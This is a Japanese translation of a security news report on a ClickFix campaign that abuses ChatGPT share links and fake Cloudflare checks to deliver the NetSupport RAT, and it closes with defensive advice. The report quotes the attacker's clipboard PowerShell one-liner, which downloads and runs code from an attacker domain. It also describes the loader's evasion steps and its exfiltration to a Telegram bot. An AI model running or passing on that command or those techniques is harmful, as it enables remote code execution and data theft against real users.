脅威アクターが正規のChatGPT会話共有URLを悪用し、被害者をClickFix型の感染フローへと誘導するソーシャルエンジニアリングの罠を仕掛け、最終的にNetSupportリモートアクセスツール(RAT)を配布していることが明らかになりました。
確認されたこの攻撃チェーンは、正規のChatGPT共有リンクchatgpt.com/s/t_6a80bc61c434819190c3eae5932307e8から始まります。このリンクは「現在アクセスが集中しています。」という虚偽の可用性通知を表示します。
そして「バックアップドメインでご利用を続けてください。」と続きます。HTTPリダイレクトやJavaScriptによるブラウザリダイレクトを使う代わりに、このページはクリック可能なリンクを提示し、被害者にopenai-backup.oneへ手動で移動するよう求めます。
このいわゆるバックアップサイトはOpenAIとは一切関係がなく、2026年8月11日に登録されたと報告されています。
ページを開くと、OpenAI風のブランディングと偽のCloudflare認証フロー、さらにgoogle.comに関する誤解を招く記述が組み合わさって表示されます。
この幾重にもなりすましを重ねた手口は、CAPTCHAやボット対策チェックに慣れたユーザーの心理を突きながら、攻撃者が管理するページを正規のものに見せかけるよう設計されています。
Exploitdatabase access
このランディングページはClickFixの手法を使用しています。ユーザーに気づかれないうちにPowerShellコマンドをWindowsのクリップボードに設置し、いわゆる認証手続きを完了させるためとして、被害者にWin+R、Ctrl+V、Enterを押すよう指示します。
この一連の操作により、ブラウザではなく被害者自身がWindowsの「ファイル名を指定して実行」ダイアログを通じてコマンドを実行することになります。
クリップボードに設置されたペイロードは以下の通りです。
powershell -C "IEX(irm 'brmconfig.com')"; exit
このコマンドは、PowerShellのInvoke-RestMethodを使ってbrmconfig.comからリモートコンテンツを取得し、Invoke-Expressionを通じて即座に実行します。
最終的な実行はユーザー自身がOSレベルで明示的に開始する形になるため、この手法はブラウザに焦点を当てた多くのセキュリティ対策を回避できます。
Joe Reverserの研究者らによると、この攻撃キャンペーンはOpenAIのchatgpt.comインフラそのものを侵害しているわけではありません。代わりに、正規のChatGPT共有ページに付随する信頼性を悪用して悪意ある指示を公開し、ユーザー自身に実行を促す手口を取っています。
悪用されるChatGPTリンク
ClickFixキャンペーンでは一般的に、偽のCAPTCHAやCloudflare、ブラウザエラー、あるいは「検証の修正」を装ったプロンプトを使って、標的に悪意あるコマンドを実行させようとします。
セキュリティ機関はこれまでも、「実行」ダイアログを開き、クリップボードの内容を貼り付け、Enterを押すという一連の見慣れた操作は、正当な本人確認プロセスではなく、ClickFixの典型的な兆候であると警告してきました。
第1段階のPowerShellローダーには、解析対策・検知回避のための機能がいくつも組み込まれています。
解析環境を示すコンピュータ名(CLEANやXORデコードされたCLENを含む)を確認し、Windows APIの呼び出しによってコンソールウィンドウを非表示にしたうえで、%ProgramData%\.ch_912137a8cc4c配下にマーカーファイルが存在するかを確認します。
続いて第2段階のPowerShellコンポーネントをBase64デコードし、GUID名の一時ファイルに書き出したうえで、-NoProfile、-ExecutionPolicy Bypass、-WindowStyle Hiddenの各引数を付けて起動します。
これらの引数により、標準的なPowerShellの実行ポリシー制限を回避しつつ、実行の痕跡を目に見える形で残しにくくしています。
第2段階のローダーは、この一連の動作をClickHunterという名称で識別し、被害者に関する詳細なメタデータを収集します。収集対象は、ホスト名、ユーザー名、ドメイン、パブリックIPアドレス、市区町村、地域、国、ISP、タイムゾーン、Windowsのバージョン、CPUアーキテクチャ、管理者権限の有無、実行時刻などです。
ip-api.comに位置情報を照会し、失敗した場合はapi.ipify.orgにフォールバックしてパブリックIPを取得します。
窃取されたシステムプロファイルは、チャットID-1004488044983に紐づくTelegramボットに送信され、攻撃者に手軽なC2(コマンド&コントロール)チャネルと被害者追跡の手段を与えます。
その後、マルウェアはhttps://brmconfig.com/video.mp4をダウンロードします。これは実際に再生可能な6.5MBのMP4ファイルですが、カスタムのMP4uuidボックス内に暗号化されたPowerShellペイロードを隠し持っています。
ローダーはUUID 6d5c057efe144b31bce5b7cf90b066a5を特定し、繰り返し鍵によるXOR処理で埋め込みデータを復号したうえで、GZip展開して1680万文字を超えるPowerShellスクリプトへと復元します。
最終的に展開されるパッケージには、app.EXeや付随するDLL、設定ファイル、各種バイナリなど、合計20個の埋め込みファイルが含まれています。
app.EXeの解析からは「NetSupport Client」および「NetSupport Manager Remote Control」を参照する文字列が確認されました。そのSHA-256ハッシュ値56ebaf8922749b9a9a7fa2575f691c53a6170662a8f747faeed11291d475c422は、Joe Sandboxによって独自にNetSupport RATであると分類されています。
NetSupport Managerは、暗号化されたリモートアクセスやログ記録、認証といった機能を備え、ITチームが業務で利用する正規のリモート制御ソフトウェアです。
しかし脅威アクターは、こうした正規のリモート監視ツールを悪用し、侵害した端末への秘密裏のアクセスを得る手口を頻繁に用いています。
防御側はopenai-backup.oneとbrmconfig.comをブロックしたうえで、IEX(irmを含むPowerShellの実行を監視し、Telegram宛の送信トラフィックを確認し、RunMRUのアーティファクトに不審な貼り付けコマンドがないか調査すべきです。
このローダーはHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUの消去を試みますが、エンドポイントのテレメトリ、PowerShellのスクリプトブロックログ、プロセス作成ログ、プロキシ記録、DNSテレメトリには証拠が残っている可能性があります。
組織はまた、正規のCAPTCHAやCloudflareの確認では、Windowsの「実行」を開いたり、クリップボードの内容を貼り付けたり、PowerShellを実行したりすることは決してないという点をユーザーに教育しておくべきです。
OpenAIの共有リンク機能では、URLを知っている人なら誰でもリンク先の会話を閲覧できます。悪意ある共有コンテンツを見つけた場合は、プラットフォームの「Report conversation」機能から報告できます。
★ どのセキュリティツールを削減すべきか?1ページでスコア化 – 継承されたセキュリティスタックガイドをダウンロード
Microsoftsecurity updates
翻訳元: https://gbhackers.com/chatgpt-links-abused/